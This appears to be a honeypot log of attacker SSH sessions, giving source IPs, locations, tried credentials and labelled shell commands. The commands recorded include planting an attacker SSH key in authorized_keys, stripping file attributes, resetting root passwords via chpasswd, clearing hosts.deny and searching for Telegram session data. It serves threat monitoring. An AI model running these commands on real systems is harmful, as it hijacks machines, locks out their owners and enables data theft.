$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\n6EAoAr95F3ie\n6EAoAr95F3ie"|passwd|bash

$ Enter new UNIX password:

$ echo "user\n6EAoAr95F3ie\n6EAoAr95F3ie\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 eagle_root_9 (40.121.200.75) — Boydton, United States · 1 session · 2 cmds

2026-04-25 15:32 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 monsoon_root_3 (168.144.65.151) — Bengaluru, India · 1 session · 1 cmd

2026-04-25 15:05 EDT · as root/toor

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 cowboy_sol_6 (162.243.116.161) — Secaucus, United States · 4 sessions · 4 cmds

2026-04-25 14:42 EDT · as sol/sol, solana/123456, solana/solana

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×4

↳ obfuscated system check

🎭 silk_root_2 (103.100.69.141) — Guancheng, China · 1 session · 2 cmds

2026-04-25 14:33 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 panda_root_2 (8.134.129.191) — Guangzhou, China · 1 session · 1 cmd

2026-04-25 14:09 EDT · as test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 clog_sol_4 (176.65.132.153) — Eygelshoven, The Netherlands · 14 sessions · 14 cmds

2026-04-25 12:47 EDT · as admin/admin123, deploy/deploy123, guest/guest

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×14

🎭 ramen_root_2 (144.48.8.10) — Taitō City, Japan · 1 session · 2 cmds

2026-04-25 12:20 EDT · as oracle/Oracle!@#$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_30 (171.244.141.86) — Hanoi, Vietnam · 1 session · 8 cmds

2026-04-25 12:20 EDT · as oracle/Oracle31!

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo ssh-rsa key → cat /proc/cpuinfo | grep name | wc -l → uname -a → lscpu | grep Model → df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_40 (186.6.185.60) — Santo Domingo, Dominican Republic · 1 session · 1 cmd

2026-04-25 10:48 EDT · as root/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_6 (121.41.116.31) — Hangzhou, China · 2 sessions · 2 cmds

2026-04-12 06:09 EDT · as root/1234, root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 panda_root_3 (113.120.108.44) — Jinan, China · 1 session · 1 cmd

2026-04-25 04:45 EDT · as user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 windmill_root_3 (192.109.200.238) — Eygelshoven, The Netherlands · 6 sessions · 6 cmds

2026-04-25 04:09 EDT · as root/123456, root/admin, root/admin123

echo (repeated echo 6x)

$ echo ok ×6

🎭 wok_root_8 (8.129.229.143) — Shenzhen, China · 2 sessions · 2 cmds

2026-04-22 09:07 EDT · as tomcat/tomcat, ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 lotus_root_6 (49.205.149.96) — Bengaluru, India · 1 session · 2 cmds

2026-04-25 02:34 EDT · as oracle/oracle7

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 panda_root_4 (120.55.114.237) — Hangzhou, China · 1 session · 1 cmd

2026-04-25 00:55 EDT · as oracle/Oracle@123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_root_16 (202.51.214.99) — Jakarta, Indonesia · 3 sessions · 24 cmds

2026-03-25 15:18 EDT · as oracle/oracle18, oracle/oracle5, user/user

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nHlzKryl3kUoj\nHlzKryl3kUoj"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nHlzKryl3kUoj\nHlzKryl3kUoj\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 silk_root_3 (117.50.130.194) — Beijing, China · 1 session · 1 cmd

2026-04-24 23:46 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 beefeater_root_4 (161.35.172.206) — Slough, United Kingdom · 2 sessions · 2 cmds

2026-04-22 18:52 EDT · as oracle/oracle123, user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 dragon_db (120.79.196.63) — Shenzhen, China · 1 session · 1 cmd

2026-04-24 22:07 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 frost_root (5.188.25.4) — St Petersburg, Russia · 27 sessions · 27 cmds

2026-04-24 20:31 EDT · as admin/admin, admin/admin123, admin/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×27

🎭 ghost_root_8 (116.193.191.209) — Cicurug, Indonesia · 13 sessions · 13 cmds

2026-04-24 18:14 EDT · as admin/admin, deploy/deploy, deploy/deploy123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×13

🎭 autobahn_root_9 (45.144.233.56) — Frankfurt Am Main, Germany · 1 session · 2 cmds

2026-04-24 18:46 EDT · as oracle/oracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 chai_root_4 (47.247.99.155) — Navi Mumbai, India · 2 sessions · 21 cmds

2026-04-23 08:06 EDT · as oracle/oracle7, root/qwerty

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:QFNHqrFs4Sns"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_39 (103.187.146.90) — Jakarta, Indonesia · 1 session · 19 cmds

2026-04-24 18:00 EDT · as root/qwerty

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:ZyxWzUBJuftV"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 seoul_root_4 (27.119.7.6) — Hwaseong-si, South Korea · 1 session · 19 cmds

2026-04-24 17:24 EDT · as root/qwerty

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:QYgGh1oKHFt5"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 jade_root_5 (1.30.199.218) — Zhangzhou, China · 1 session · 19 cmds

2026-04-24 17:17 EDT · as root/qwerty

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:8Zn4Fc1OetOt"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 tulip_root_2 (45.153.34.97) — Eygelshoven, Netherlands · 14 sessions · 14 cmds

2026-04-24 16:30 EDT · as admin/123456, admin/admin, guest/guest

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×14

🎭 pretzel_root (94.26.106.229) — Kriftel, Germany · 16 sessions · 16 cmds

2026-04-24 14:14 EDT · as admin/123456, admin/admin, deploy/deploy123

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 wraith_root_29 (103.146.159.173) — Sheung Wan, Hong Kong · 1 session · 2 cmds

2026-04-24 12:48 EDT · as oracle/Oracle21

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 blitz_root_4 (130.61.193.112) — Frankfurt am Main, Germany · 12 sessions · 12 cmds

2026-04-24 10:14 EDT · as admin/admin123, oracle/oracle123, postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×12

🎭 wraith_root_30 (43.245.97.82) — Singapore, Singapore · 1 session · 2 cmds

2026-04-24 10:25 EDT · as oracle/oracle3

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_31 (80.201.218.177) — Liège, Belgium · 1 session · 9 cmds

2026-04-24 09:46 EDT · as root/root

root/root login → cloud metadata introspection (/ip cloud print) → network interface enumeration (ifconfig) → OS fingerprinting (uname -a) → hardware profiling via /proc/cpuinfo → cryptominer detection (ps grep) → Telegram data artifact hunting → custom hash string search → benign echo output

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 wraith_root_19 (103.210.21.178) — Hong Kong, Hong Kong · 3 sessions · 23 cmds

2026-03-25 01:38 EDT · as oracle/Oracle19!, oracle/password, root/qwerty

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "root:X6mhaK9CcTAK"|chpasswd|bash → rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh → cat

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:X6mhaK9CcTAK"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lantern_root_4 (47.112.212.87) — Shenzhen, China · 1 session · 1 cmd

2026-04-24 03:26 EDT · as deploy/deploy

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tsar_root (193.124.118.138) — Kazan', Russia · 32 sessions · 32 cmds

2026-04-23 23:40 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×32

🎭 phantom_root_21 (47.239.73.30) — Hong Kong, Hong Kong · 1 session · 1 cmd

